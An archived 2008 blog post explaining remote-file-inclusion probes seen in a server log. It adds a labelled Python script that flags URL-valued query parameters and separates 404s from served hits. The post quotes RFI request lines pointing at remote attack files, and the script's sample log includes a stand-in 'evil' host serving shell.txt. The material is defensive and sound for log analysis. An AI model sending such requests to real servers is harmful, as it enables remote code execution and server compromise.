Are nasty programs looking for security holes on your server?
Archive - Originally posted on "The Horse's Mouth" - 2008-02-17 06:51:25 - Graham Ellis
Looking through my log file reports for the last week, I have found the following in my "failed requests" log.
546: /errors.php
52: /errors.php?error=http://www.beautiful-america.com/admin/id.txt?
42: /errors.php?error=http://www.ticarbon.de/phpBB2/files/i?
32: /errors.php?error=http://test.iearn.uz/test.iearn.uz/assist.txt???
27: /errors.php?error=http://www.dg-mitteldeutschland.de/sys_crank/i?
26: /errors.php?error=http://hornydate.co.uk/sparky.txt??
25: /errors.php?error=http://www.sternkinder2007.de/video/lol?
So what are these requests? Should I be worried?
They're attempts to break into my system. But I'm not being particularly targeted - this is an automated attack. It calls a script (errors.php) that I don't actually have, hoping that the script will include and run PHP code held on those remote sites, which have themselves been compromised earlier. If it succeeds, the attacker sets the same hole up on my system and carries on to the next target.
The particular accesses above don't worry me in themselves - they were all "404"d, since there is no errors.php here for the request to reach - but they are a warning of the dangers of letting PHP include code from an external URL: an include() whose path is taken from user input, on a server with allow_url_include (or, on older PHP, allow_url_fopen) switched on.
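To show how such probes can be picked out of an access log, here is an added Python example; it is not code from the original post. It constructs a few log lines in Apache "combined" format, modelled on the entries above but with placeholder hosts, flags any query parameter whose value is itself a URL, and separates the 404s from requests that were actually served, since a served request means the script exists and may have fetched the remote file. The log lines, host names and parameter names are assumptions made for the illustration.

```python
# Added example (not from the original post): flag remote-file-inclusion (RFI)
# probes in a combined-format access log and summarise them the way the
# "failed requests" report above does.  The log lines below are constructed
# for illustration; the hosts are placeholders, not the ones in the post.
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" format:
#   client ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value that is itself an http/https/ftp URL, or a
# protocol-relative "//host/...", is the signature of an RFI probe: the
# attacker is hoping include($_GET['error']) will fetch and run that file.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftps?)://|^//', re.IGNORECASE)

# Constructed sample log (assumed data).  The last line is a search box being
# handed a URL-encoded URL: a value-based rule flags it too, which is the
# false positive a practitioner has to triage by hand.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Feb/2008:06:12:01 +0000] "GET /errors.php?error=http://example.invalid/admin/id.txt? HTTP/1.1" 404 212
203.0.113.7 - - [17/Feb/2008:06:12:02 +0000] "GET /errors.php?error=http://example.invalid/admin/id.txt? HTTP/1.1" 404 212
198.51.100.9 - - [17/Feb/2008:06:13:44 +0000] "GET /errors.php?error=http://files.example.invalid/i? HTTP/1.1" 404 212
198.51.100.9 - - [17/Feb/2008:06:13:45 +0000] "GET /index.php?page=//evil.example.invalid/shell.txt HTTP/1.1" 200 5120
192.0.2.44 - - [17/Feb/2008:06:15:00 +0000] "GET /courses/php.html HTTP/1.1" 200 9876
192.0.2.44 - - [17/Feb/2008:06:15:03 +0000] "GET /search.php?q=http%3A%2F%2Fexample.org HTTP/1.1" 200 3210
"""


def parse_line(line):
    """Parse one combined-format line; return None for lines that don't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values so a bare "?error=" is still recorded as a parameter;
    # parse_qsl also %-decodes, so an encoded "http%3A%2F%2F" is caught.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def rfi_params(rec):
    """Return the (name, value) pairs whose value points at a remote file."""
    return [(k, v) for k, v in rec["params"] if REMOTE_URL_RE.match(v.strip())]


def scan(log_text):
    """Count RFI probes and collect the ones the server actually served.

    Returns (probes, served): probes maps (path, param, remote_url) -> count,
    served lists probes that got a 2xx.  A 404 means the targeted script does
    not exist here; a 2xx means it does, and the remote file may have been
    fetched, so those are the hits to investigate.
    """
    probes = Counter()
    served = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rfi_params(rec):
            probes[(rec["path"], name, value)] += 1
            if 200 <= rec["status"] < 300:
                served.append((rec["client"], rec["path"], name, value, rec["status"]))
    return probes, served


def report(log_text):
    """Render the count-by-URL summary in the same "N: /path?x=y" style as above."""
    probes, served = scan(log_text)
    lines = [f"{n}: {path}?{name}={value}"
             for (path, name, value), n in probes.most_common()]
    return lines, served


if __name__ == "__main__":
    summary, served = report(SAMPLE_LOG)
    print("RFI probes by script and remote file:")
    for line in summary:
        print(" ", line)
    print("Served (non-404) probes to investigate:")
    for client, path, name, value, status in served:
        print(f"  {client} {path}?{name}={value} -> {status}")
```

Run as a script it prints the same count-by-URL summary as the report above, followed by the served hits. Of the two served hits in the sample, one is a search box being given a URL, which a value-based rule cannot tell apart from a vulnerable include without knowing the application; treat the served list as a triage queue, not a verdict. Every probe in the log counts on this page was a 404, which is exactly why they are a warning rather than an incident.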
Visiting the URLs given as the "error=" parameter, I find a variety of "not found" pages which means that the hole has not been closed on the remote system, and nasty pieces of PHP which mean that the remote machine is still compromised. (If you, reading this article, visit any of them you should get a 404, as I have distorted the URLs that were live - I don't want to make this into a "how to break in" manual page!). But I do have copies of the scripts that I can show bona fide delegates on our PHP courses, and of the further log details of the programs (often in Perl) that are injected.
If you are worried about being infected, the particular attack file contains the string "Mic22" - so if you search for that ...